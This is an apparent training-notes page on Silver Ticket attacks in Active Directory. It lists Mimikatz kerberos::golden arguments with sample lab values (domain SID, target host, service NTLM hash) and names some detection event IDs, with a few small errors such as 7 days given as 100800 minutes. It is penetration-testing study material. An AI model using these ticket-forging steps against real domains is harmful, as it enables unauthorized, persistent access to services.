GithubTwitter

Silver Tickets

General

  • A valid TGS

  • Encrypted and signed by NTLM hash of the target service account

  • Services rarely check PAC (Privileged Attribute Certificate)

  • Services will allow access only to the services themselves

  • Reasonable persistence period (detauled 30 days for computer accounts)

Exploitation

Arguments

Argument
Description

kerberos::golden

Name of the module (there is no Silver module!)

/domain:domain:dollarcorp.moneycorp.local

Domain FQDN

/sid:S-1-5-21-1874506631-3219952063-538504511

SID of the domain

/target:dcorp dc.dollarcorp.moneycorp.local

Target server FQDN

/User:Administrator

Username for which the TGT is generated

/id:500 /groups:512

Optional User RID (default 500) and Group (default 513 512 520 518 519)

/service:cifs

The SPN name of the target service for the TGS

/rc4:6f5b5acaf7433b3282ac22e21e62ff22

NTLM (RC4) hash of the service/machine account (<MACHINE-NAME$>). Use /aes128 and /aes256 for using AES keys.

/startoffset:0

Optional when the ticket is available (default 0 right now) in minutes. Use negative for a ticket available from past and a larger number for future.

/endin:600

Optional ticket lifetime (default is 10 years) in minutes. The default AD setting is 10 hours = 600 minutes

/renewmax:10080

Optional ticket lifetime with renewal (default is 10 years) in minutes. The default AD setting is 7 days = 100800

/ptt

Injects the ticket in current PowerShell process no need to save the ticket on disk

Commands

Getting Command Execution

Scheduled Tasks through HOST Service

WMI

Detection

  • Event IDs:

    • 4624: Account Logon

    • 4634: Account Logoff

    • 4672: Admin Logon

PreviousGolden TicketsNextACL Attacks

Last updated